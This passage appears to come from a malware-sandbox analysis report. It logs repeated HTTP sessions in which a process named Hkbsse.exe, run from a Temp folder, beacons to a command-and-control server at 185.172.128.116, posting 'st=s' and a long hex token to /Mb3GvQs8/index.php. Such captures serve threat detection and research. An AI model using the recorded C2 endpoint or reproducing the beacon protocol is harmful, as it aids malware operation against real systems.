                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        62192.168.2.559034185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:59.564429045 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:00.235538960 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:00 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:00.237914085 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:00.437601089 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:00 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        63192.168.2.559035185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:00.548228979 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:01.220547915 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:01 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:01.221455097 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:01.427973032 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:01 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        64192.168.2.559036185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:01.911540985 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:02.556598902 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:02 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:02.557727098 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:02.752446890 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:02 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        65192.168.2.559037185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:02.861555099 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:03.503173113 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:03 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:03.504107952 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:03.703701019 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:03 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        66192.168.2.559038185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:03.814210892 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:04.451983929 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:04 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:04.458620071 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:04.656601906 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:04 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        67192.168.2.559039185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:04.768565893 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:05.412432909 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:05 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:05.415741920 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:05.609504938 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:05 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        68192.168.2.559040185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:05.722908020 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:06.359935045 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:06 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:06.361072063 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:06.553273916 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:06 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        69192.168.2.559041185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:06.673876047 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:07.332196951 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:07 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:07.336642981 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:07.533489943 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:07 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        70192.168.2.559042185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:07.663569927 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:08.556297064 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:08 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:08.556611061 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:08 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:08.557404041 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
